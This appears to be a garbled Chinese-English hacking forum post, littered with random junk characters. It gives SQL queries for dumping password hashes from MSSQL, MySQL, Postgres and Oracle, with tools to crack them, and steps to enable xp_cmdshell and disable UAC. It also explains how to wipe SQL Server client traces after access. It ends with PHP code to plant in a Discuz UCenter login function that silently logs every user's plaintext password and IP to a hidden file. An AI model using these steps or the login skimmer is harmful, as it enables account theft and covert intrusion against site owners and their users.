0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503419 R" u( y2 D9 ]4 [& B: D0 m8 j* E
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
1 B" j- R6 c: U# U& }% Q& {
1 g( Z9 S: T# [% `0×0100- constant header
8 @. e; d- z2 g+ t34767D5C- salt% W7 z* h+ ^) q
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash. M- J$ `8 C: I7 Q# d W* g% O% q k. J
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
. o$ m# [5 W7 A% Icrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
@0 ] B& d( M+ BSQL server 2005:-
% U0 R, R* Y8 f" z/ cSELECT password_hash FROM sys.sql_logins where name='sa' D. f M4 I2 b1 T6 A
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F W/ C% `6 b6 h& c+ W3 ^
0×0100- constant header
/ [ [- J" w4 W* ?. E8 ?9 b993BF231-salt
0 q2 E+ v5 [) D5 T7 D% H1 g5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
8 _0 m& [7 b. k qcrack case sensitive hash in cain, try brute force and dictionary based attacks.# M1 Z. K. X8 L
4 S& X8 A. d- W9 fupdate:- following bernardo’s comments:-
1 ]0 c6 k- w& Ause function fn_varbintohexstr() to cast password in a hex string.
' j7 l6 `' w S9 V) a$ we.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
% Y7 ^4 G0 ?) u, b: g9 _4 P, Y$ [& y9 r
MYSQL:-
4 E) {* M+ L5 G4 a2 z
x! }( G3 Z& i( ~! r1 cIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.3 Q! }% L1 ?* l0 L# n
! W6 I* a g% }& R9 A
*mysql < 4.18 ^% N; |* q7 O1 x" ?
9 L( B* B0 t2 K# C; Y6 @; d& N; W
mysql> SELECT PASSWORD(‘mypass’);$ X: B7 _# `$ q' t0 u- w
+——————–+
( a( u" J9 R, n& f7 s( f1 @8 U: p/ s| PASSWORD(‘mypass’) |
2 `; w& H4 K3 o; r# r3 F/ U7 r, _2 t+——————–+
- } N. e9 Z, H# S2 u+ Z+ j| 6f8c114b58f2ce9e |
- `% c& {8 O' S6 t% k+ O7 {0 Y: }+——————–+) f) A) H3 l+ V; K) |
( m, z7 i- p& h
*mysql >=4.1 h# A- M, ?. D. O* X+ Q: y
* l' Z; r Y" {$ Rmysql> SELECT PASSWORD(‘mypass’);; f* a, @: c# ?
+——————————————-+
" T5 n% }) e6 Z# ]. W$ {| PASSWORD(‘mypass’) |- `& j1 U4 e r5 o0 z
+——————————————-+
7 Z) r5 l6 f: i% _| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" u; ]! l1 q" {) [( ^! T3 F* [6 _( f
+——————————————-+
) s" _4 W( {$ @2 }; H
5 B9 r6 r$ z& OSelect user, password from mysql.user2 J5 Z: g+ V* W& d, ~. s- g
The hashes can be cracked in ‘cain and abel’
9 l" c# E& _5 u! l" T! v! R! m/ e5 z( w6 O9 }
Postgres:-/ u; Q& V0 W) d1 g6 b
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)1 S) A t; s% r) E$ l2 S) {
select usename, passwd from pg_shadow;
6 }4 P/ G9 }9 g- \6 ausename | passwd8 p3 B- h( _% ]5 f: L9 k U
——————+————————————-
6 V' J& K# X9 ?% A+ u' Wtestuser | md5fabb6d7172aadfda4753bf0507ed43963 a: v) j5 x' F# {& K' Y. p
use mdcrack to crack these hashes:-5 r. f" R# }0 M/ [+ T6 B! D4 z
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
0 G; B6 t3 l% T( A1 c# h* ^
% s* `- D4 a2 J+ |3 G7 a9 W; NOracle:-
4 T) q9 o- \: y w- e$ t1 {select name, password, spare4 from sys.user$/ M: b! y% E7 N/ ^' k$ y6 q
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g9 i0 I b- M6 j0 c- A$ d) i
More on Oracle later, i am a bit bored….
9 o5 d: g4 T3 R, e4 a6 ~1 t
: a0 c& R1 F: Z- M4 U; f5 s3 _6 z
( y& i8 v1 J) R在sql server2005/2008中开启xp_cmdshell
& N+ \9 e8 o9 R( M" M4 `, ^-- To allow advanced options to be changed.
7 v0 N. i/ K6 l: ?+ W+ jEXEC sp_configure 'show advanced options', 10 z2 k! B! ?( ]( u/ J
GO
4 s4 J8 v1 L {/ ]-- To update the currently configured value for advanced options.6 O E. f# I& S8 P6 W ^' @
RECONFIGURE- T: T; a( P/ S+ T$ q
GO
( v* T3 I6 g& Q5 D% o4 _-- To enable the feature. N+ U, E u" Q( l' g3 _
EXEC sp_configure 'xp_cmdshell', 1
* w; N3 D' S# W# WGO
2 Q. ~3 K2 O, M$ o$ w-- To update the currently configured value for this feature.7 V/ f0 R7 f7 o5 T
RECONFIGURE
- x" W, R \2 I% M/ d( j( YGO3 @! x8 m0 C# r
SQL 2008 server日志清除,在清楚前一定要备份。' g( e6 ?6 V3 K5 Q0 {7 B8 J% d
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:. T! X& T; T8 f( Y
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin) G/ G3 L( K b1 d3 j T& I F
* {: O# L+ q3 T2 \- `
对于SQL Server 2008以前的版本:# N7 u2 I$ z [) J8 E
SQL Server 2005:3 X2 D, e0 U! o! f, c1 |
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
6 c8 Y0 U7 N* E0 x- j- d8 U7 S. Q5 fSQL Server 2000:
. q; c9 ]* {9 Y清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
b1 o$ O j7 l8 a/ u; }
6 d5 Y* b7 S: i本帖最后由 simeon 于 2013-1-3 09:51 编辑
& f1 Z5 j' _3 M! g( Y4 s
& e1 Y7 X: R- a+ |$ T# q0 d; Z
- G( |. o u6 c! wwindows 2008 文件权限修改* E/ b3 z5 F7 e& B8 X/ y& h
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx. q4 Q# ^$ z+ V8 O% u3 |' J" O: u
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98) J/ J0 p! z- n9 i5 K( ]/ c
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,: P) o. D# q7 l! R7 E6 Q! B
. M, B8 L& \. S- ` X' r8 [( p2 A
Windows Registry Editor Version 5.000 E7 Z+ P% M2 `" j( F5 q% K' T
[HKEY_CLASSES_ROOT\*\shell\runas]
* g5 m7 u2 {' |5 p8 T2 i* B; J@="管理员取得所有权"
( O. e _" y8 a/ R& T) ^ o2 _"NoWorkingDirectory"=""& S( G$ H. p- T; }$ l
[HKEY_CLASSES_ROOT\*\shell\runas\command]
( k L; e. l6 s) D1 w2 z4 \) g# M@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. ^' F5 y$ [' H5 Y' \. I5 H, z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" u" t; T0 ]( K[HKEY_CLASSES_ROOT\exefile\shell\runas2]
) k5 o* f. [, m/ i@="管理员取得所有权"# ^8 w3 `" Y# J- |
"NoWorkingDirectory"=""
F9 [! H6 I$ R3 s[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]3 A: }, P" x" m, G; q3 r7 s) y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" n5 `4 @% e7 f* \) X7 X
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 d$ \* t) D$ Q6 s1 v' @6 N) w& K' |8 G5 T
[HKEY_CLASSES_ROOT\Directory\shell\runas]3 T+ B2 X) K" Z- I
@="管理员取得所有权"
2 g* d/ I, ~' g5 R7 U# B2 k8 G4 x$ y. c"NoWorkingDirectory"=""/ H- V" |5 S7 Z" C( ^8 u' h" D% c5 D
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]' n, h/ [' q1 \ f& O1 g& @! J3 E
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
8 D8 N1 H' Z8 P2 y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"7 L4 H* d8 f. @& L! Y/ G) o" `
6 ? \, y( M# y) \" x
" F5 b8 ?! L; T+ P' p$ R: `win7右键“管理员取得所有权”.reg导入
T9 z. { X ^& }% r2 r3 Q9 J; b二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
9 L7 R7 _2 A& U+ U1 r4 v c1、C:\Windows这个路径的“notepad.exe”不需要替换
& D' T8 E% @! E- t' U5 G0 D2、C:\Windows\System32这个路径的“notepad.exe”不需要替换* M8 O5 d9 x. k( t e; E! i% j
3、四个“notepad.exe.mui”不要管& e! x8 r6 y# D% |; K8 T
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
' m! C5 v/ N& M$ u+ J: Y3 ?8 z3 VC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
' j$ U. b+ F& ~; c6 K替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,* E* |" _4 X+ z0 [+ F: n( Y
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。) r$ {( m' H- C1 O R# k# L: g
windows 2008中关闭安全策略: % j4 [+ k/ v! O. c4 e# f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
, v, }5 w' E. Q& {. V- g0 K' Q" c- i4 ]修改uc_client目录下的client.php 在
9 Y+ D3 _' u3 d- }) J9 E4 ufunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 m' v; \/ f7 l2 x* O8 H下加入如上代码,在网站./data/cache/目录下自动生成csslog.php6 R& ^ n/ s2 Y1 D
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw' m8 B5 R1 J" [- W0 ]$ b; f5 B
if(getenv('HTTP_CLIENT_IP')) {. s8 x5 A1 ~9 x: d& f
$onlineip = getenv('HTTP_CLIENT_IP');0 j4 t. f9 s, }$ u, `; B
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {( c/ o6 c5 a) C) O: i, r6 O
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
$ U: ? S. T# }} elseif(getenv('REMOTE_ADDR')) {# q' L/ [9 j. g
$onlineip = getenv('REMOTE_ADDR');
( G/ S r) R9 B5 \! k8 N} else { ^3 F, o: Z- s
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
& h4 w, o+ _6 P/ ]3 a* F}
3 j1 K* T7 C+ Z7 V, r $showtime=date("Y-m-d H:i:s");* b. J: I6 R' k5 k( n7 T. H2 @
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";1 z( v; E9 P" g3 R4 `" |( E$ R
$handle=fopen('./data/cache/csslog.php','a+');1 R4 U+ K0 [2 @; U; w
$write=fwrite($handle,$record); |